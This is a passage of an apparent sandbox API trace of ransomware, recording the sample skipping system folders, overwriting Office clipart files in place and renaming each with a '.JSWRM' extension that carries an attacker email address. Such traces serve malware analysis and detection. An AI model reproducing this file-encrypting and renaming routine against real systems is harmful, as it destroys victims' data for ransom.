hHeap=0x1e0000) returned 1 [0074.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0074.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01251_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01251_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01251_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0074.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.091] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2756) returned 1 [0074.091] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xac0) returned 0x24c1d0 [0074.091] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xac0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xac0, lpOverlapped=0x0) returned 1 [0074.093] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.093] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xac0, lpOverlapped=0x0) returned 1 [0074.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.093] CloseHandle (hObject=0x460) returned 1 [0074.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0074.093] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0074.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0074.093] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0074.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0074.093] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.093] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01251_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0074.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.094] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbf13fd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbf13fd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc3d96c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ccc, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN01545_.WMF", cAlternateFileName="")) returned 1 [0074.094] lstrcmpiW (lpString1="AN01545_.WMF", lpString2=".") returned 1 [0074.094] lstrcmpiW (lpString1="AN01545_.WMF", lpString2="..") returned 1 [0074.094] lstrcmpiW (lpString1="AN01545_.WMF", lpString2="...") returned 1 [0074.094] lstrcmpiW (lpString1="AN01545_.WMF", lpString2="windows") returned -1 [0074.094] lstrcmpiW (lpString1="AN01545_.WMF", lpString2="recovery") returned -1 [0074.094] lstrcmpiW (lpString1="AN01545_.WMF", lpString2="perflogs") returned -1 [0074.094] lstrcmpiW (lpString1="AN01545_.WMF", lpString2="documents and settings") returned -1 [0074.094] lstrcmpiW (lpString1="AN01545_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.094] lstrcmpiW (lpString1="AN01545_.WMF", lpString2="system volume information") returned -1 [0074.094] lstrcmpiW (lpString1="AN01545_.WMF", lpString2="msocache") returned -1 [0074.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0074.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01545_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.094] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01545_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01545_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.094] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0074.094] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0074.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01545_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN01545_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN01545_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0074.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.095] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.095] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7372) returned 1 [0074.095] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.095] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1cc0) returned 0x24c1d0 [0074.095] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1cc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1cc0, lpOverlapped=0x0) returned 1 [0074.097] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.097] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1cc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1cc0, lpOverlapped=0x0) returned 1 [0074.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.097] CloseHandle (hObject=0x460) returned 1 [0074.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0074.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0074.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0074.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0074.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0074.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.098] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01545_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01545_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0074.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.098] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc63b1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc63b1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xccaffc4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d74, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN02122_.WMF", cAlternateFileName="")) returned 1 [0074.098] lstrcmpiW (lpString1="AN02122_.WMF", lpString2=".") returned 1 [0074.098] lstrcmpiW (lpString1="AN02122_.WMF", lpString2="..") returned 1 [0074.098] lstrcmpiW (lpString1="AN02122_.WMF", lpString2="...") returned 1 [0074.098] lstrcmpiW (lpString1="AN02122_.WMF", lpString2="windows") returned -1 [0074.098] lstrcmpiW (lpString1="AN02122_.WMF", lpString2="recovery") returned -1 [0074.098] lstrcmpiW (lpString1="AN02122_.WMF", lpString2="perflogs") returned -1 [0074.098] lstrcmpiW (lpString1="AN02122_.WMF", lpString2="documents and settings") returned -1 [0074.098] lstrcmpiW (lpString1="AN02122_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.098] lstrcmpiW (lpString1="AN02122_.WMF", lpString2="system volume information") returned -1 [0074.098] lstrcmpiW (lpString1="AN02122_.WMF", lpString2="msocache") returned -1 [0074.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0074.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN02122_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN02122_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN02122_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0074.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0074.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN02122_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN02122_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN02122_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0074.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.099] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.099] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0074.100] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7540) returned 1 [0074.100] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1d70) returned 0x24c1d0 [0074.100] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1d70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1d70, lpOverlapped=0x0) returned 1 [0074.101] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.102] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1d70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1d70, lpOverlapped=0x0) returned 1 [0074.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0074.102] CloseHandle (hObject=0x460) returned 1 [0074.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0074.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0074.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0074.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0074.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0074.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0074.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0074.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0074.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0074.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0074.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0074.102] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0074.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0074.102] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0074.102] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02122_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02122_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0074.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0074.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0074.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0074.103] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc63b1c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcc63b1c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcc63b1c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19e8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AN02559_.WMF", cAlternateFileName="")) returned 1 [0074.103] lstrcmpiW (lpString1="AN02559_.WMF", lpString2=".") returned 1 [0074.103] lstrcmpiW (lpString1="AN02559_.WMF", lpString2="..") returned 1 [0074.103] lstrcmpiW (lpString1="AN02559_.WMF", lpString2="...") returned 1 [0074.103] lstrcmpiW (lpString1="AN02559_.WMF", lpString2="windows") returned -1 [0074.103] lstrcmpiW (lpString1="AN02559_.WMF", lpString2="recovery") returned -1 [0074.103] lstrcmpiW (lpString1="AN02559_.WMF", lpString2="perflogs") returned -1 [0074.103] lstrcmpiW (lpString1="AN02559_.WMF", lpString2="documents and settings") returned -1 [0074.103] lstrcmpiW (lpString1="AN02559_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0074.103] lstrcmpiW (lpString1="AN02559_.WMF", lpString2="system volume information") returned -1 [0074.103] lstrcmpiW (lpString1="AN02559_.WMF", lpString2="msocache") returned -1 [0074.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0074.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN02559_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN02559_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN02559_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0074.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0074.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN02559_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0074.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AN02559_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AN02559_.WMF", lpUsedDefaultChar=0x0) returned 12 [0074.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0074.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0074.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0074.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0074.103] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0074.104] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0074.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN02559_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an02559_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 